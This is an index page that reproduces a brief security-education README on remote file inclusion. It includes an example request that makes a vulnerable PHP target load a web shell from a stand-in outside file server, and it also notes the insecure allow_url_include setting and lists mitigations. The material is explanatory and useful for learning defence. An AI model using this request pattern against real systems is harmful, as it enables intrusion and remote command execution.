Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/qeeqbox/remote-file-inclusion
A threat actor may cause a vulnerable target to include/retrieve remote file
https://github.com/qeeqbox/remote-file-inclusion
file inclusion infosecsimplified qeeqbox remote vulnerability
Last synced: 2 days ago
JSON representation
A threat actor may cause a vulnerable target to include/retrieve remote file
- Host: GitHub
- URL: https://github.com/qeeqbox/remote-file-inclusion
- Owner: qeeqbox
- License: agpl-3.0
- Created: 2023-06-22T08:07:11.000Z (over 1 year ago)
- Default Branch: main
- Last Pushed: 2024-01-29T00:56:48.000Z (10 months ago)
- Last Synced: 2024-05-01T11:27:24.778Z (7 months ago)
- Topics: file, inclusion, infosecsimplified, qeeqbox, remote, vulnerability
- Homepage:
- Size: 262 KB
- Stars: 1
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
A threat actor may cause a vulnerable target to include/retrieve remote file
## Example #1
1. A threat actor uploads a PHP web shell to a temporary file service
2. A threat actor sends a malicious request that includes the remote file name to a vulnerable target
3. The vulnerable target executes malicious files as PHP
## Code
#### Target-Logic
```php
#allow_url_include = On
```
#### Target-In
```
http://vulnerable.test/index.php?file=http://fileserver.test/shell.php
```
#### Target-Out
```
root
```
## Impact
High
## Names
- Remote file inclusion
- RFI
## Risk
- Read & Write data
- Command Execution
## Redemption
- Input validation
- Whitelist
## ID
cb60059e-846f-40df-9dbd-e687e8d6960a
## References
- [Wikipedia](https://en.wikipedia.org/wiki/file_inclusion_vulnerability)